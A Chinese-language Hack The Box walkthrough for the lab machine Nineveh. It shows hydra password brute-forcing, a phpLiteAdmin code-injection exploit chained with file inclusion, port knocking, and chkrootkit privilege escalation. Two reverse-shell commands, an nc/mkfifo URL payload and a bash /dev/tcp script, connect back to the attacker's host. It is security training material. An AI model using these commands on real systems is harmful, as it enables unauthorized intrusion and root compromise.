当前位置:   article > 正文

Linux/Nineveh

Linux/Nineveh

Nineveh

Enumeration

nmap

先使用 nmap 扫描常见端口,发现只开放了 80 和 443 端口,不想扫描详细信息了

  1. ┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
  2. └─$ nmap 10.10.10.43
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-01 01:42 EDT
  4. Nmap scan report for 10.10.10.43
  5. Host is up (0.45s latency).
  6. Not shown: 998 filtered tcp ports (no-response)
  7. PORT STATE SERVICE
  8. 80/tcp open http
  9. 443/tcp open https
  10. Nmap done: 1 IP address (1 host up) scanned in 36.22 seconds

两个端口展示的内容不同,80 端口显示如下

443 端口显示如下

Web 页面中都没有什么东西,使用 gobuster 扫描一下目录

  1. gobuster dir --url http://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.80
  2. gobuster dir --url https://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.443 -k

80 端口扫描出来发现了一个 /department 接口,访问会自动跳转至 /department/login.php,输入常见的用户名口令admin/123456 登录,页面提示 invalid password,而输入 vegetable 作为用户名,页面会显示 invalid username,可以确认用户名为 admin

没有密码,暂时也不想暴力破解,查看 443 端口的目录扫描结果,发现了 /db 接口,访问发现页面如下

phpLiteAdmin 是一个基于 Web 的 SQLite 数据库管理工具,用 PHP 编写,支持 SQLite3 和 SQLite2。遵循 SQLite 使用的平面文件系统的精神,phpLiteAdmin 由单个源文件 phpliteadmin.php 组成,该文件被放入服务器上的目录中,然后在浏览器中访问。

因为很知名,用的人也很多,也已经知道了版本信息。搜索看看有没有漏洞

Exploitation

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection

我比较感兴趣的是最后一个,版本匹配,而且可以执行命令,不过首先需要登录。phpLiteAdmin 系统只需要输入密码即可,可以尝试利用 hydra 来暴力破解,虽然只需要爆破密码,但是仍然需要指定一个用户名,虽然可能并不会使用指定的用户名,这里我指定了 admin,选用了一个比较小的字典,很快就得到了答案

  1. ┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
  2. └─$ hydra 10.10.10.43 -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
  3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  4. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 03:42:54
  5. [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
  6. [DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
  7. [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
  8. [443][http-post-form] host: 10.10.10.43 login: admin password: password123
  9. 1 of 1 target successfully completed, 1 valid password found
  10. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 03:43:34

很快就发现了密码,使用 password123 登录系统,然后按照 PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com) 来进行漏洞利用

1、创建一个新的数据库 hack.php

2、创建一个新表,类型为 TEXT,Value 为

3、创建成功返回后,可以点击 Rename Database 来查看路径

但是无法访问该文件,线索又断了,只能重新回到 80 端口,因为可以确定用户名为 admin,尝试暴力破解登录看看,然后非常快就得到了结果

  1. ┌──(kali㉿kali)-[~]
  2. └─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
  3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  4. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 04:53:05
  5. [DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
  6. [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^:Invalid Password
  7. [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
  8. 1 of 1 target successfully completed, 1 valid password found
  9. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 04:53:19

使用用户名口令登录系统,点击 Notes 可以看到下面的话,secret folder,还有 url 的格式感觉都像是 LFI

测试如果直接添加 ···manage.php?notes=../../../../../../../etc/passwd 则会显示 No Note is selected,添加上 /files/ninevehNotes.txt 又会报错,在尝试后,发现在 txt 后添加 7 个 ../ 可以成功包含文件

但是当我使用命令 manage.php?notes=files/ninevehNotes/../../../../../../../var/tmp/hack.php 尝试包含刚才创建的 hack.php 时又会显示 File name too long. 然后我删掉了一个 ../ 成功的包含了 hack.php 文件,并且可以执行命令

可以在 Online - Reverse Shell Generator (revshells.com) 中构造一个反向连接 shell,执行后在监听端会收到一个 shell

  1. http://10.10.10.43/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.9%204444%20%3E%2Ftmp%2Ff
  2. ┌──(kali㉿kali)-[~]
  3. └─$ nc -nvlp 4444
  4. listening on [any] 4444 ...
  5. connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 33734
  6. bash: cannot set terminal process group (1412): Inappropriate ioctl for device
  7. bash: no job control in this shell
  8. www-data@nineveh:/var/www/html/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
  9. <tml/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
  10. www-data@nineveh:/var/www/html/department$ ^Z
  11. zsh: suspended nc -nvlp 4444
  12. ┌──(kali㉿kali)-[~]
  13. └─$ stty raw -echo;fg
  14. [1] + continued nc -nvlp 4444
  15. reset
  16. reset: unknown terminal type unknown
  17. Terminal type? screen

Privilege Escalation

steghide

目前拿到了 www-data 的 shell,在 /var/www/ssl/secure_notes 目录中发现了一张图片 nineveh.png,使用 cat 直接打开时发现出现了下面的 rsa 密钥,可以直接使用 strings 命令打开,看起来会舒服一点,将私钥复制保存在 kali 机器中,并为其赋予 600 权限,以便后期可以利用密钥连接 ssh 服务

port knocking

一开始使用 nmap 扫描并没有发现 22 端口,需要利用 port knocking

  1. www-data@nineveh:/var/www/ssl/secure_notes$ netstat -anultp | grep 22
  2. (Not all processes could be identified, non-owned process info
  3. will not be shown, you would have to be root to see it all.)
  4. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  5. tcp6 0 0 :::22 :::* LISTEN -

knockd 程序,当按照一定顺序敲击端口时,它将会设置某些防火墙规则,配置文件如下。看到如果在 5 秒钟之内,按照 571,290,911 的顺序依次访问这些端口,达成敲门效果,则会对外开放 22 端口

  1. www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
  2. [options]
  3. logfile = /var/log/knockd.log
  4. interface = ens160
  5. [openSSH]
  6. sequence = 571, 290, 911
  7. seq_timeout = 5
  8. start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
  9. tcpflags = syn
  10. [closeSSH]
  11. sequence = 911,290,571
  12. seq_timeout = 5
  13. start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
  14. tcpflags = syn

可以参考 端口敲击 - ArchWiki (archlinux.org) 来查看如何操作,因为只有 5 秒,所以可以利用 for 循环让机器自动执行 nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 操作,在所有端口都访问过之后,22 端口会被打开,利用 id_rsa 来连接 ssh 服务

  1. ┌──(kali㉿kali)-[~]
  2. └─$ for i in 571 290 911; do
  3. nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43
  4. done; ssh -i vegetable/HTB/Nineveh/id_rsa amrois@10.10.10.43
  5. Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
  6. Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
  7. Nmap scan report for 10.10.10.43
  8. Host is up.
  9. PORT STATE SERVICE
  10. 571/tcp filtered umeter
  11. Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
  12. Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
  13. Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
  14. Nmap scan report for 10.10.10.43
  15. Host is up.
  16. PORT STATE SERVICE
  17. 290/tcp filtered unknown
  18. Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
  19. Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
  20. Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
  21. Nmap scan report for 10.10.10.43
  22. Host is up.
  23. PORT STATE SERVICE
  24. 911/tcp filtered xact-backup
  25. Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
  26. Ubuntu 16.04.2 LTS
  27. Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
  28. * Documentation: https://help.ubuntu.com
  29. * Management: https://landscape.canonical.com
  30. * Support: https://ubuntu.com/advantage
  31. 288 packages can be updated.
  32. 207 updates are security updates.
  33. You have mail.
  34. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
  35. amrois@nineveh:~$

成功登录后,在当前目录下可以看到 user.txt

chkrootkit

上传 linpeas.sh 来枚举系统弱点,发现存在有计划任务,在 report 目录下存在有很多 report.txt,并且 /usr/sbin/report-reset.sh 也会定期删除这些文件

  1. amrois@nineveh:/report$ ls -al
  2. total 56
  3. drwxr-xr-x 2 amrois amrois 4096 Apr 2 02:05 .
  4. drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
  5. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:00 report-24-04-02:02:00.txt
  6. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:01 report-24-04-02:02:01.txt
  7. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:02 report-24-04-02:02:02.txt
  8. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:03 report-24-04-02:02:03.txt
  9. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:04 report-24-04-02:02:04.txt
  10. -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:05 report-24-04-02:02:05.txt

上传并运行 pspy,发现了每分钟都有一连串的任务,很多进程调用了 chkrootkit 工具,搜索时发现该工具存在本地提权漏洞

  1. ┌──(kali㉿kali)-[~]
  2. └─$ searchsploit chkrootkit
  3. ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
  4. Exploit Title | Path
  5. ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
  6. Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
  7. Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
  8. ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
  9. Shellcodes: No Results

漏洞其实就是该程序会定期以 root 身份执行 /tmp/update 文件,所以在 /tmp 目录下创建一个包含有反向 shell 连接脚本内容的 update文件即可

  1. amrois@nineveh:/tmp$ cat update
  2. #!/bin/bash
  3. bash -i >& /dev/tcp/10.10.14.22/443 0>&1

过一段时间,在监听端即可收到 shell

参考链接:

phpLiteAdmin

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com)

Online - Reverse Shell Generator (revshells.com)

端口敲击 - ArchWiki (archlinux.org)

HTB: 尼尼微 |0xdf黑客的东西

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/395477
推荐阅读
相关标签
  

闽ICP备14008679号